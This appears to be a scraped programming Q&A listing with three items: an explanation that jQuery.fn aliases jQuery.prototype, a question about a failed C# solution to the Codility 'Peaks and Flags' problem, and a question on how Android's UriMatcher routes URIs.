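    The second snippet is itself the answer: jQuery.fn is assigned the very same object as jQuery.prototype, so they are two names for one thing. A small illustration (mine, not from jquery.js): since every jQuery object is built by new jQuery.fn.init(...), and jquery.js later wires init's prototype back to jQuery.fn, anything added to jQuery.fn becomes a method of every jQuery object, which is the classic plugin pattern.

    // Not from jquery.js: adding to jQuery.fn is how plugins are written.
    jQuery.fn.shout = function () {
        return this.each(function () {
            this.textContent = this.textContent + '!';
        });
    };

    // usage: jQuery('h1').shout(); // every h1 gains a trailing '!'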

    Read the article

  • Explain the Peak and Flag Algorithm

    - by Isaac Levin
EDIT: It was just pointed out that the requirements state peaks cannot be at the ends of the array.

So I ran across this site, http://codility.com/, which gives you programming problems and gives you certificates if you can solve them in 2 hours. The very first question is one I have seen before, typically called the Peaks and Flags question. If you are not familiar:

A non-empty zero-indexed array A consisting of N integers is given. A peak is an array element which is larger than its neighbours. More precisely, it is an index P such that 0 < P < N - 1 and A[P - 1] < A[P] > A[P + 1]. For example, the following array A:

A[0] = 1
A[1] = 5
A[2] = 3
A[3] = 4
A[4] = 3
A[5] = 4
A[6] = 1
A[7] = 2
A[8] = 3
A[9] = 4
A[10] = 6
A[11] = 2

has exactly four peaks: elements 1, 3, 5 and 10. You are going on a trip to a range of mountains whose relative heights are represented by array A. You have to choose how many flags you should take with you. The goal is to set the maximum number of flags on the peaks, according to certain rules. Flags can only be set on peaks. What's more, if you take K flags, then the distance between any two flags should be greater than or equal to K. The distance between indices P and Q is the absolute value |P - Q|. For example, given the mountain range represented by array A, above, with N = 12, if you take: two flags, you can set them on peaks 1 and 5; three flags, you can set them on peaks 1, 5 and 10; four flags, you can set only three flags, on peaks 1, 5 and 10. You can therefore set a maximum of three flags in this case.

Write a function that, given a non-empty zero-indexed array A of N integers, returns the maximum number of flags that can be set on the peaks of the array. For example, given the array above the function should return 3, as explained above. Assume that: N is an integer within the range [1..100,000]; each element of array A is an integer within the range [0..1,000,000,000]. Complexity: expected worst-case time complexity is O(N); expected worst-case space complexity is O(N), beyond input storage (not counting the storage required for input arguments). Elements of input arrays can be modified.

So this makes sense, but I failed it using this code:

public int GetFlags(int[] A)
{
    List<int> peakList = new List<int>();
    for (int i = 1; i < A.Length - 1; i++) // interior elements only; the ends lack a neighbour
    {
        if (A[i] > A[i + 1] && A[i] > A[i - 1])
        {
            peakList.Add(i);
        }
    }

    List<int> flagList = new List<int>();
    int distance = peakList.Count;
    flagList.Add(peakList[0]);
    for (int i = 1, j = 0, max = peakList.Count; i < max; i++)
    {
        if (Math.Abs(Convert.ToDecimal(peakList[j]) - Convert.ToDecimal(peakList[i])) >= distance)
        {
            flagList.Add(peakList[i]);
            j = i;
        }
    }
    return flagList.Count;
}

EDIT:

int[] A = new int[] { 7, 10, 4, 5, 7, 4, 6, 1, 4, 3, 3, 7 };

The correct answer is 3, but my application says 2. This I do not get, since there are 4 peaks (indices 1, 4, 6, 8) and from that, you should be able to place a flag at 2 of the peaks (1 and 6). Am I missing something here? Obviously my assumption is that the beginning or end of an array can be a peak; is this not the case? If this needs to go in Stack Exchange Programmers, I will move it, but I thought dialog here would be helpful.

    Read the article

  • Can anyone explain UriMatcher (Android SDK)?

    - by mobibob
I have been tasked with designing my web services client code to use the utility class UriMatcher in the Android SDK. Unfortunately, the example in the Dev Guide does not relate to anything in my mind. I know I am missing some fundamental points about the functionality and possibly about Uri itself. If you can tie it to some web APIs that are accessible with HTTP POST requests, that would be ideal.
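    A minimal sketch of the idiom (the authority, paths, and route codes are hypothetical): UriMatcher is just a routing table that turns a Uri into an int, which you then switch on, classically inside a ContentProvider.

    import android.content.UriMatcher;
    import android.net.Uri;

    public class RouteDemo {
        static final int MESSAGES = 1;       // the whole collection
        static final int MESSAGE_ID = 2;     // one message, by numeric id

        static final UriMatcher MATCHER = new UriMatcher(UriMatcher.NO_MATCH);
        static {
            // '#' matches any number; '*' would match any text segment
            MATCHER.addURI("com.example.provider", "messages", MESSAGES);
            MATCHER.addURI("com.example.provider", "messages/#", MESSAGE_ID);
        }

        static String describe(Uri uri) {
            switch (MATCHER.match(uri)) {
                case MESSAGES:   return "the whole collection";
                case MESSAGE_ID: return "message " + uri.getLastPathSegment();
                default:         return "no route";
            }
        }
        // describe(Uri.parse("content://com.example.provider/messages/42"))
        //     -> "message 42"
    }

    The same dispatch works for a web services client: match the incoming Uri to a route code, then build the corresponding HTTP POST request for that endpoint.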

    Read the article
